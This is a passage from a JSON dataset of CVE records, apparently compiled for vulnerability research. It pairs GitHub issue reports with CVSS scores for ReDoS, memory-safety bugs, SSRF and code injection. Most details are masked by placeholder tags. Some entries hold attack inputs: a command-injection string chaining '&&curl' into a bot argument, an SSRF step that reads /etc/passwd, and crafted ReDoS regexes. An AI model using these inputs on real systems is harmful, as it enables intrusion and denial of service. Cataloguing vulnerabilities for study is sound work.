  62954. "description": "Groups of consecutive underscores in a specific pattern hang/take a long time to convert. Marked version NUMBERTAG Describe the bug NUMBERTAG or more groups of odd and even numbered consecutive underscores followed by a character takes a very long time to convert. Example input: APITAG If you click on the Marked Demo link below, you will see that this takes a long time to convert (approximately NUMBERTAG minutes). The input above is NUMBERTAG underscores NUMBERTAG underscores NUMBERTAG underscores, and an a . Modifying the input in a number of ways changes the conversion time to APITAG NUMBERTAG FILETAG NUMBERTAG APITAG Demo URLTAG Expected behavior The markdown to html conversion should take roughly the same amount of time as it does as when the above example input is modified such in one of the ways describe above (i.e NUMBERTAG ms).",
  62955. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  62956. "severity": "HIGH",
  62957. "baseScore": 7.5,
  62958. "impactScore": 3.6,
  62959. "exploitabilityScore": 3.9
  62960. },
  62961. {
  62962. "CVE_ID": "CVE-2021-21323",
  62963. "Issue_Url_old": "https://github.com/brave/brave-browser/issues/13527",
  62964. "Issue_Url_new": "https://github.com/brave/brave-browser/issues/13527",
  62965. "Repo_new": "brave/brave-browser",
  62966. "Issue_Created_At": "2021-01-12T23:53:28Z",
  62967. "description": "[hackerone] Tor DNS issue. URLTAG related NUMBERTAG it appears this was a known issue at least in the muon days. unclear if it was ever fixed in brave core. URLTAG suggests that DNS prefetching may be the only source of this leak, and supposedly this can be disabled via the 'preload pages' setting in PATHTAG",
  62968. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  62969. "severity": "MEDIUM",
  62970. "baseScore": 5.3,
  62971. "impactScore": 1.4,
  62972. "exploitabilityScore": 3.9
  62973. },
  62974. {
  62975. "CVE_ID": "CVE-2021-21353",
  62976. "Issue_Url_old": "https://github.com/pugjs/pug/issues/3312",
  62977. "Issue_Url_new": "https://github.com/pugjs/pug/issues/3312",
  62978. "Repo_new": "pugjs/pug",
  62979. "Issue_Created_At": "2021-02-10T06:17:12Z",
  62980. "description": "Code injection vulnerability in APITAG and APITAG through \"pretty\" option. Hello, I found that pug may allow an attacker to inject arbitrary javascript code if an attacker can control APITAG . Pug Version NUMBERTAG Proof of concept Here is an vulnerable example including NUMBERTAG files: FILETAG and index.pug . In the example, there is only one variable \"pretty\" that is controlled by user, and the variable is not used in any dangerous functions. FILETAG ERRORTAG views/index.pug APITAG But if we visit URL below, it would lead to execute OS command \"whoami\". APITAG Detail This section will point the location of vulnerability and explain why I assume it's an issue. First of all, when Compiler object is initialized, APITAG would be saved in APITAG . URLTAG The APITAG function is simple, APITAG is pushed into APITAG array which stores the compiled code of template without any sanitization. APITAG URLTAG The APITAG is basically same as APITAG , APITAG is pushed without any sanitization at line NUMBERTAG APITAG : URLTAG If we look at how other functions handle options variables, we can see that they are all sanitized by stringify. ( APITAG is implemented with APITAG and APITAG always sanitizes variable with stringify. ) with APITAG : URLTAG with APITAG : URLTAG with stringify : URLTAG APITAG The APITAG and APITAG are the only two functions I found that are missing sanitization. I think it may be an issue.",
  62981. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  62982. "severity": "CRITICAL",
  62983. "baseScore": 9.0,
  62984. "impactScore": 6.0,
  62985. "exploitabilityScore": 2.2
  62986. },
  62987. {
  62988. "CVE_ID": "CVE-2021-21361",
  62989. "Issue_Url_old": "https://github.com/bmuschko/gradle-vagrant-plugin/issues/19",
  62990. "Issue_Url_new": "https://github.com/bmuschko/gradle-vagrant-plugin/issues/19",
  62991. "Repo_new": "bmuschko/gradle-vagrant-plugin",
  62992. "Issue_Created_At": "2021-02-15T18:01:12Z",
  62993. "description": "Potential credentials leak when setting APITAG Problem Currently if APITAG is set, this will cause the whole environment from the Gradle process URLTAG to be inherited to the vagrant command. This is then printed on info level to the console log URLTAG . Context A common pattern for injecting credentials into the build process on build servers is to set them as environment variables on the build tool process. This way e.g. the credentials for deploying to maven central can be passed the Gradle tasks that need them. So when my build executes a Vagrant task that has some environment variables set and also has reads some credentials from the environment, this may leak the credentials to build scans and the build server log. Options Remove envp from console output. log on debug level this will prevent the output to show up in build scans. It will not prevent the output to end up in build server logs, if Gradle is configured to log on debug level. Add a verbose configuration flag to control whether or not the command and environment should be printed to the log. It should default to false .",
  62994. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  62995. "severity": "MEDIUM",
  62996. "baseScore": 6.5,
  62997. "impactScore": 3.6,
  62998. "exploitabilityScore": 2.8
  62999. },
  63000. {
  63001. "CVE_ID": "CVE-2021-21401",
  63002. "Issue_Url_old": "https://github.com/nanopb/nanopb/issues/647",
  63003. "Issue_Url_new": "https://github.com/nanopb/nanopb/issues/647",
  63004. "Repo_new": "nanopb/nanopb",
  63005. "Issue_Created_At": "2021-03-20T00:14:28Z",
  63006. "description": "Ill formed oneof message leads to calling free on an arbitrary pointer. This affects APITAG (and probably lower versions, though I haven't checked) with APITAG enabled. Specially crafted bytes can make APITAG eventually call APITAG on an arbitrary pointer. Here's the smallest repro case I could make: ERRORTAG Running this leads to: ERRORTAG I can repro this on both Linux and Mac. What I believe happens is: the first two bytes are interpreted as APITAG and result in APITAG URLTAG being set to APITAG URLTAG ; the third byte is interpreted as a field tag referring to APITAG . Because there are no more bytes in the input, decoding the field fails (with APITAG ). However, the current field is reset to APITAG from APITAG while APITAG is not cleared and is still set to APITAG ; seeing that decoding failed, APITAG tries to release the message. APITAG , thinking that the current field is APITAG , considers the contents of APITAG to refer to a dynamically allocated array and calls APITAG on it URLTAG . I'm not sure what the right fix would be perhaps APITAG should be set to null when oneof fields are switched, or perhaps the current field should not be changed until it is successfully parsed? Note that this is a potential security issue. I presume that if the first field was an integer, an arbitrary value could be written to it which would then be interpreted as an address and passed to free . Note: this was found by OSS Fuzz on Firestore (note that I have trimmed down the repro case from the original).",
  63007. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
  63008. "severity": "HIGH",
  63009. "baseScore": 7.1,
  63010. "impactScore": 4.2,
  63011. "exploitabilityScore": 2.8
  63012. },
  63013. {
  63014. "CVE_ID": "CVE-2021-21417",
  63015. "Issue_Url_old": "https://github.com/FluidSynth/fluidsynth/issues/808",
  63016. "Issue_Url_new": "https://github.com/fluidsynth/fluidsynth/issues/808",
  63017. "Repo_new": "fluidsynth/fluidsynth",
  63018. "Issue_Created_At": "2021-03-14T06:33:16Z",
  63019. "description": "fluidsynth crashes when loading malformed sf2 file. version: APITAG APITAG APITAG .... URLTAG It says APITAG is the last gen, and then set level to NUMBERTAG and break. CODETAG but if a malformed sf2 doesn't contain APITAG it will finally goto here: URLTAG CODETAG it will be freed again at: URLTAG APITAG APITAG > APITAG > APITAG > APITAG > APITAG > APITAG Here is an example that trigger this vuln. FILETAG FILETAG FILETAG Programs like VLC that use this library are affected by this vulnerability: FILETAG",
  63020. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63021. "severity": "MEDIUM",
  63022. "baseScore": 5.5,
  63023. "impactScore": 3.6,
  63024. "exploitabilityScore": 1.8
  63025. },
  63026. {
  63027. "CVE_ID": "CVE-2021-21422",
  63028. "Issue_Url_old": "https://github.com/mongo-express/mongo-express/issues/577",
  63029. "Issue_Url_new": "https://github.com/mongo-express/mongo-express/issues/577",
  63030. "Repo_new": "mongo-express/mongo-express",
  63031. "Issue_Created_At": "2020-05-30T09:14:49Z",
  63032. "description": "HTML in String fields is not escaped. Version: docker image latest (as of NUMBERTAG Docker Image mongo APITAG I use a APITAG collection to save HTML Dokuments in a string property of documents and use mongo express to access the Mongo Database. Especially when the properties with the HTML content are not loaded directly because of their size and I click on APITAG the HTML content is loaded and rendered by the browser. If you need further information please feel free to ask I'll try to answer as fast as possible. Here are some Screenshots from my browser: The Screenshots are from the complete page so they are really long but I think they demonstrate the Problem quite well. Normal View: FILETAG Opened a first HTML content attribute by clickin on APITAG Property\": FILETAG Opened a second HTML content attribute FILETAG Opened multiple HTML content attirbutes: FILETAG",
  63033. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63034. "severity": "MEDIUM",
  63035. "baseScore": 6.1,
  63036. "impactScore": 2.7,
  63037. "exploitabilityScore": 2.8
  63038. },
  63039. {
  63040. "CVE_ID": "CVE-2021-21433",
  63041. "Issue_Url_old": "https://github.com/DEMON1A/Discord-Recon/issues/6",
  63042. "Issue_Url_new": "https://github.com/demon1a/discord-recon/issues/6",
  63043. "Repo_new": "demon1a/discord-recon",
  63044. "Issue_Created_At": "2021-02-25T10:26:02Z",
  63045. "description": "Blind RCE \u0641\u0633\u064a\u0631\u0641\u0631\u0643 \u064a\u0627 \u0628\u064a\u0629. \u0639\u0634\u0627\u0646 \u0627\u0646\u062a\u0627 \u0627\u062e\u0648\u064a\u0627 \u0636\u064a\u0641 \u0627\u0644\u0631\u0627\u062c\u0644 \u0627\u0644\u062c\u062f\u0639 \u0645\u062d\u0628\u062a\u0634 \u0627\u0647\u0646\u0643\u0631\u0643 .dirsearch anything&&curl FILETAG .anytool anything&&curl FILETAG APITAG Kind Regards, APITAG",
  63046. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  63047. "severity": "HIGH",
  63048. "baseScore": 8.8,
  63049. "impactScore": 5.9,
  63050. "exploitabilityScore": 2.8
  63051. },
  63052. {
  63053. "CVE_ID": "CVE-2021-21979",
  63054. "Issue_Url_old": "https://github.com/bitnami/bitnami-docker-laravel/issues/139",
  63055. "Issue_Url_new": "https://github.com/bitnami/bitnami-docker-laravel/issues/139",
  63056. "Repo_new": "bitnami/bitnami-docker-laravel",
  63057. "Issue_Created_At": "2021-03-02T19:09:25Z",
  63058. "description": "Laravel APP_KEY is fixed in docker image bitnami/laravel. Description The file PATHTAG is generated at the time that the docker image bitnami/laravel was built, and the value of APP_KEY is fixed under certain conditions. Although the APP_KEY will generated randomly each time we install laravel: APITAG But if we build it as a docker image, the APP_KEY is a fixed value whenever we run it. This value is crucial for the security of the application and must be randomly generated per Laravel installation. An attacker would be able to perform a deserialization attack, for instance using a Laravel vulnerability CVETAG URLTAG . If your application's encryption key is in the hands of a malicious party, that party could craft cookie values using the encryption key and exploit vulnerabilities inherent to PHP object serialization / unserialization, such as calling arbitrary class methods within your application. Fix The Entrypoint now regenerates the APP_KEY if the app is not mounted and copied from the default one. This issue was reported by LEI WANG URLTAG on February the NUMBERTAG rd and it was fixed on Feburary the NUMBERTAG th. The following container images have been released with the fi NUMBERTAG debian NUMBERTAG r NUMBERTAG or newer NUMBERTAG debian NUMBERTAG r NUMBERTAG or newer NUMBERTAG debian NUMBERTAG r0 or newer",
  63059. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  63060. "severity": "HIGH",
  63061. "baseScore": 7.3,
  63062. "impactScore": 3.4,
  63063. "exploitabilityScore": 3.9
  63064. },
  63065. {
  63066. "CVE_ID": "CVE-2021-22563",
  63067. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/735",
  63068. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/735",
  63069. "Repo_new": "libjxl/libjxl",
  63070. "Issue_Created_At": "2021-10-14T20:01:32Z",
  63071. "description": "splines: segfault due to out of bounds access of segment array. Hello, this NUMBERTAG byte JPEG XL image, found via fuzz testing, causes a segfault during decoding (using the latest commit on the main branch). FILETAG ERRORTAG It looks like, when drawing spline segments, APITAG for this image contains NUMBERTAG entries but APITAG can return higher values for y that result in APITAG reading beyond the end of this. URLTAG The following patch to APITAG demonstrates a possible guard to prevent the segfault, but there's almost certainly a better way to fix this. CODETAG",
  63072. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
  63073. "severity": "MEDIUM",
  63074. "baseScore": 4.4,
  63075. "impactScore": 2.5,
  63076. "exploitabilityScore": 1.8
  63077. },
  63078. {
  63079. "CVE_ID": "CVE-2021-22873",
  63080. "Issue_Url_old": "https://github.com/revive-adserver/revive-adserver/issues/1068",
  63081. "Issue_Url_new": "https://github.com/revive-adserver/revive-adserver/issues/1068",
  63082. "Repo_new": "revive-adserver/revive-adserver",
  63083. "Issue_Created_At": "2019-06-24T06:42:33Z",
  63084. "description": "open redirect (oadest url) FILETAG revive NUMBERTAG dear all, we've found bug in our revive about FILETAG (oadest) FILETAG > it will be redirect to url destination we read this url FILETAG that we should upgrade version, but this bug (as we think is a bug) still can open redirect this is issue will harm our site and the victims could be redirect to phissing website could you guide us what we should do again, even after upgrade version NUMBERTAG still can open redirect",
  63085. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63086. "severity": "MEDIUM",
  63087. "baseScore": 6.1,
  63088. "impactScore": 2.7,
  63089. "exploitabilityScore": 2.8
  63090. },
  63091. {
  63092. "CVE_ID": "CVE-2021-22877",
  63093. "Issue_Url_old": "https://github.com/nextcloud/server/issues/24600",
  63094. "Issue_Url_new": "https://github.com/nextcloud/server/issues/24600",
  63095. "Repo_new": "nextcloud/server",
  63096. "Issue_Created_At": "2020-12-07T21:33:05Z",
  63097. "description": "Wrong (malformed) external storage credentials saved in APITAG . APITAG Hello! I am using Nextcloud NUMBERTAG in docker with LDAP auth + external storage and with several external SMB mounts (all with \"credentials saved in database\" enabled). It seems that the credentials saved in the corrspondeing table ( APITAG ) are wrong and therefore all SMB shares are showing errors. When I initially add the external storage SMB mounts in the settings and then a user logs in the first time, the SMB shares work (with the correct login) which gets correctly saved in the DB. Afterwards I can find one single entry on the APITAG table However, when I (as an admin) navigate to: APITAG the APITAG table gets populated with all the users (and some random credentials) this also includes all users who wasn\u00b4t ever logged in in nextcloud. When the user logs in afterward the credentials entry is already there and does not get updated. Steps to reproduce NUMBERTAG Add external SMB mount with option \"credentials saved in database NUMBERTAG Manually check the MYSQL table APITAG it should be empty NUMBERTAG As an admin: navigate to ( APITAG NUMBERTAG Recheck the MYSQL table APITAG there is an entry for every user now NUMBERTAG Login as new user and try to access a SMB share access denied. Expected behaviour NUMBERTAG Do not populate the table APITAG on \"user list settings page NUMBERTAG If the current user credentials does not match the ones in the DB > update it Actual behaviour Tell us what happens instead Debugging results In the file APITAG : When I output the APITAG on each request I get two results: for the admin user listing all users on the settings page: there is a full browser page with binary crap printed. while logged in with the specific user it prints the actual loginame of that user Bugfix APITAG When I change APITAG : from APITAG to APITAG it works correctly. With thix change the credentials gets stored on every request and therefore the wrong (initialized) ones getting overwritten. Server configuration I am using this docker image (no modifications): URLTAG Operating system: Docker on Ubuntu NUMBERTAG LTS Web server: nginx with php fpm Database: mariadb NUMBERTAG as docker container PHP version NUMBERTAG php NUMBERTAG Nextcloud version NUMBERTAG Updated from an older APITAG or fresh install: updated from nextcloud NUMBERTAG in one go) Where did you install Nextcloud from: Signing status: APITAG APITAG status APITAG ERRORTAG APITAG List of activated apps: APITAG APITAG list APITAG Enabled: accessibility NUMBERTAG activity NUMBERTAG cloud_federation_api NUMBERTAG comments NUMBERTAG da NUMBERTAG drawio NUMBERTAG external NUMBERTAG extract NUMBERTAG federatedfilesharing NUMBERTAG federation NUMBERTAG files NUMBERTAG files_external NUMBERTAG files_linkeditor NUMBERTAG files_pdfviewer NUMBERTAG files_rightclick NUMBERTAG files_sharing NUMBERTAG files_trashbin NUMBERTAG files_versions NUMBERTAG files_videoplayer NUMBERTAG logreader NUMBERTAG lookup_server_connector NUMBERTAG metadata NUMBERTAG notifications NUMBERTAG oauth NUMBERTAG photos NUMBERTAG provisioning_api NUMBERTAG ransomware_protection NUMBERTAG settings NUMBERTAG sharebymail NUMBERTAG socialsharing_email NUMBERTAG text NUMBERTAG theming NUMBERTAG theming_customcss NUMBERTAG twofactor_backupcodes NUMBERTAG APITAG NUMBERTAG twofactor_totp NUMBERTAG twofactor_u2f NUMBERTAG updatenotification NUMBERTAG user_ldap NUMBERTAG iewer NUMBERTAG workflowengine NUMBERTAG Disabled: admin_audit contactsinteraction dashboard encryption firstrunwizard nextcloud_announcements password_policy privacy recommendations serverinfo spreed support survey_client systemtags user_status weather_status APITAG Nextcloud configuration: APITAG APITAG report APITAG ERRORTAG APITAG Are you using external storage, if yes which one: SMB Are you using encryption: no encryption at rest Are you using an external user backend, if yes which one: LDAP LDAP configuration (delete this part if not used) APITAG APITAG LDAP config APITAG ERRORTAG APITAG Client configuration Browser: Chromoum NUMBERTAG Operating system: APITAG NUMBERTAG Logs In the nextcloud log section you can find the log of the initial user login who gets \"denied\" on the SMB storage due to wrong stored credentials. Nextcloud log APITAG APITAG APITAG log APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for APITAG ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG",
  63098. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  63099. "severity": "MEDIUM",
  63100. "baseScore": 6.5,
  63101. "impactScore": 5.2,
  63102. "exploitabilityScore": 1.2
  63103. },
  63104. {
  63105. "CVE_ID": "CVE-2021-23158",
  63106. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/414",
  63107. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/414",
  63108. "Repo_new": "michaelrsweet/htmldoc",
  63109. "Issue_Created_At": "2021-01-26T08:44:03Z",
  63110. "description": "APITAG double free in function pspdf_export ps APITAG Hello, While fuzzing htmldoc , I found a double free in pspdf_export test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63111. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63112. "severity": "CRITICAL",
  63113. "baseScore": 9.8,
  63114. "impactScore": 5.9,
  63115. "exploitabilityScore": 3.9
  63116. },
  63117. {
  63118. "CVE_ID": "CVE-2021-23165",
  63119. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/413",
  63120. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/413",
  63121. "Repo_new": "michaelrsweet/htmldoc",
  63122. "Issue_Created_At": "2021-01-26T08:39:00Z",
  63123. "description": "APITAG heap buffer overflow in APITAG in ps APITAG Hello, While fuzzing htmldoc , I found a heap buffer overflow in the APITAG ,in ps APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG",
  63124. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63125. "severity": "CRITICAL",
  63126. "baseScore": 9.8,
  63127. "impactScore": 5.9,
  63128. "exploitabilityScore": 3.9
  63129. },
  63130. {
  63131. "CVE_ID": "CVE-2021-23180",
  63132. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/418",
  63133. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/418",
  63134. "Repo_new": "michaelrsweet/htmldoc",
  63135. "Issue_Created_At": "2021-01-26T09:02:25Z",
  63136. "description": "APITAG SEGV in file_extension APITAG Hello, While fuzzing htmldoc , I found aSEGV in file_extension function in APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63137. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63138. "severity": "HIGH",
  63139. "baseScore": 7.8,
  63140. "impactScore": 5.9,
  63141. "exploitabilityScore": 1.8
  63142. },
  63143. {
  63144. "CVE_ID": "CVE-2021-23191",
  63145. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/415",
  63146. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/415",
  63147. "Repo_new": "michaelrsweet/htmldoc",
  63148. "Issue_Created_At": "2021-01-26T08:50:41Z",
  63149. "description": "APITAG SEGV on unknown address NUMBERTAG Hello, While fuzzing htmldoc , I found SEGV on unknown address test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63150. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63151. "severity": "HIGH",
  63152. "baseScore": 7.8,
  63153. "impactScore": 5.9,
  63154. "exploitabilityScore": 1.8
  63155. },
  63156. {
  63157. "CVE_ID": "CVE-2021-23206",
  63158. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/416",
  63159. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/416",
  63160. "Repo_new": "michaelrsweet/htmldoc",
  63161. "Issue_Created_At": "2021-01-26T08:54:36Z",
  63162. "description": "APITAG stack buffer overflow in parse_table ps APITAG Hello, While fuzzing htmldoc , I found a stack buffer overflow in APITAG ps APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63163. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63164. "severity": "HIGH",
  63165. "baseScore": 7.8,
  63166. "impactScore": 5.9,
  63167. "exploitabilityScore": 1.8
  63168. },
  63169. {
  63170. "CVE_ID": "CVE-2021-23330",
  63171. "Issue_Url_old": "https://github.com/bitovi/launchpad/issues/123",
  63172. "Issue_Url_new": "https://github.com/bitovi/launchpad/issues/123",
  63173. "Repo_new": "bitovi/launchpad",
  63174. "Issue_Created_At": "2020-06-19T16:59:31Z",
  63175. "description": "Security Notice & Bug Bounty Remote Code Execution APITAG This issue has been generated on behalf of Mik NUMBERTAG URLTAG Overview launchpad URLTAG allows you to launch browsers! With APITAG The issue occurs because a user input is formatted inside a command that will be executed without any check. Bug Bounty We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded \ud83d\udcb0? Go to FILETAG We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to URLTAG \ud83d\udcda APITAG generated by APITAG helper..._",
  63176. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63177. "severity": "CRITICAL",
  63178. "baseScore": 9.8,
  63179. "impactScore": 5.9,
  63180. "exploitabilityScore": 3.9
  63181. },
  63182. {
  63183. "CVE_ID": "CVE-2021-23341",
  63184. "Issue_Url_old": "https://github.com/PrismJS/prism/issues/2583",
  63185. "Issue_Url_new": "https://github.com/prismjs/prism/issues/2583",
  63186. "Repo_new": "prismjs/prism",
  63187. "Issue_Created_At": "2020-10-11T13:08:45Z",
  63188. "description": "APITAG in prism. Hi, I would like to report NUMBERTAG APITAG vulnerabilities in prism ( URLTAG \u200b). It allows cause a denial of service if highlighting crafted codes. The first APITAG The vulnerable regular expression is APITAG and is located in URLTAG The APITAG vulnerability can be exploited with the following crafted code string ERRORTAG The second APITAG The vulnerable regular expression is APITAG and is located in URLTAG \u200b The APITAG vulnerability can be exploited with the following crafted code string\u200b APITAG The third APITAG The vulnerable regular expression is APITAG and is located in URLTAG \u200b The APITAG vulnerability can be exploited with the following crafted code string\u200b CODETAG The fourth APITAG The vulnerable regular expression is APITAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG ) PATHTAG ) \\] CODETAG APITAG APITAG (^[^\\S ] ) (?: ?| )(?:. (?: ?| )) ?[^\\S ] PATHTAG CODETAG \u200b APITAG ((?:^|[&(])[ ] )if(?: ?\\/[a z?](?:[ : ?:\"[^\"] \"|\\S+))? (?:not )?(?:cmdextversion \\d+|defined \\w+|errorlevel \\d+|exist \\S+|(?:\"[^\"] \"|\\S+)?(?:==| (?:equ|neq|lss|leq|gtr|geq) )(?:\"[^\"] \"|\\S+)) CODETAG 'if NUMBERTAG CODETAG APITAG in the root directory NUMBERTAG Input the above crafted code strings and select the corresponding languages",
  63189. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63190. "severity": "HIGH",
  63191. "baseScore": 7.5,
  63192. "impactScore": 3.6,
  63193. "exploitabilityScore": 3.9
  63194. },
  63195. {
  63196. "CVE_ID": "CVE-2021-23343",
  63197. "Issue_Url_old": "https://github.com/jbgutierrez/path-parse/issues/8",
  63198. "Issue_Url_new": "https://github.com/jbgutierrez/path-parse/issues/8",
  63199. "Repo_new": "jbgutierrez/path-parse",
  63200. "Issue_Created_At": "2021-02-09T06:59:32Z",
  63201. "description": "APITAG in path parse. Hi, I would like to report two Regular Expression Denial of Service APITAG vulnerabilities in APITAG . It allows cause a denial of service when parsing crafted invalid paths. You can execute the code below to reproduce the vulnerability.\u200b ERRORTAG Feel free to contact me if you have any questions. Best regards, Yeting Li\u200b\u200b\u200b\u200b",
  63202. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63203. "severity": "HIGH",
  63204. "baseScore": 7.5,
  63205. "impactScore": 3.6,
  63206. "exploitabilityScore": 3.9
  63207. },
  63208. {
  63209. "CVE_ID": "CVE-2021-23345",
  63210. "Issue_Url_old": "https://github.com/thecodingmachine/gotenberg/issues/261",
  63211. "Issue_Url_new": "https://github.com/gotenberg/gotenberg/issues/261",
  63212. "Repo_new": "gotenberg/gotenberg",
  63213. "Issue_Created_At": "2020-11-24T19:30:47Z",
  63214. "description": "Server Side Request Forgery APITAG (in version NUMBERTAG Expected Behavior When attempting to convert html into a PDF using the /html endpoint, gotenberg should throw an exception (respond with a bad request) whenever there is an attempt to convert html with a source (src) reference to an internal system file. FILETAG FILETAG Possible Solution Respond with a bad request. Or something that indicates the requested operation is not allowed or prohibited. Check the contents of the HTML file being uploaded to determine if similar file:// protocols are referenced The use of server side requests must be limited to specific scenarios required by the application and servers must be hardened to only allow those requests. SSRF can be remediated using a variety of standard web application protections, such as NUMBERTAG Limit service types via input validation on user input: Analyze if the application must use URI/ URL in requests and if not, disallow them. When a use case requires URIs and URLs in requests, perform input validation on URI/URLs using whitelists or robust blacklists. For example, only allow URL schemes such as HTTP/HTTPS which are often required for accessing applications. Disable all other URL schemas such as file://, dict://, gopher://, ftp://. Alternatively, create a token based forwarding for SSRs which may eliminate the use of URIs altogether NUMBERTAG Limit service interactions: Carefully analyze if the server requires interactions with external servers. Based on the use case, prevent unintended behavior in one of the following ways: External service interactions required: If the server is to perform interactions with external services, the server must be hardened to safely eliminate calls to services available on the local loopback adapter and prevent any calls from the server to other internal systems NUMBERTAG External service interactions not required: If the server is to only interact with local services, configure outbound firewall rules to check any calls being made from the application. The rules must limit the web server's interaction with other hosts by routing traffic only to specified resources on the local network; i.e., web servers must disallow connections to any host not included in the whitelist. Steps to Reproduce (for bugs NUMBERTAG Configure Postman to use a proxy tool such as Burp Suite NUMBERTAG Create an HTML file using the below data: test blank html APITAG NUMBERTAG Toggle Burp Intercept on NUMBERTAG Upload this HTML file and make a request to the APITAG endpoint NUMBERTAG Forward the intercepted request to Repeater and hit send NUMBERTAG In Repeater > response section, right click and select \"show response in browser NUMBERTAG Open the response in a browser NUMBERTAG Note that the PDF file contains contents of /etc/passwd file. FILETAG FILETAG Context We'd like to hide information about the server and not allow attackers to steal sensitive data Your Environment Azure Linux Container OS version: Uni NUMBERTAG bit system: True NUMBERTAG bit process: True Processor count NUMBERTAG",
  63215. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  63216. "severity": "MEDIUM",
  63217. "baseScore": 5.3,
  63218. "impactScore": 1.4,
  63219. "exploitabilityScore": 3.9
  63220. },
  63221. {
  63222. "CVE_ID": "CVE-2021-23351",
  63223. "Issue_Url_old": "https://github.com/pires/go-proxyproto/issues/69",
  63224. "Issue_Url_new": "https://github.com/pires/go-proxyproto/issues/69",
  63225. "Repo_new": "pires/go-proxyproto",
  63226. "Issue_Created_At": "2021-02-28T20:09:28Z",
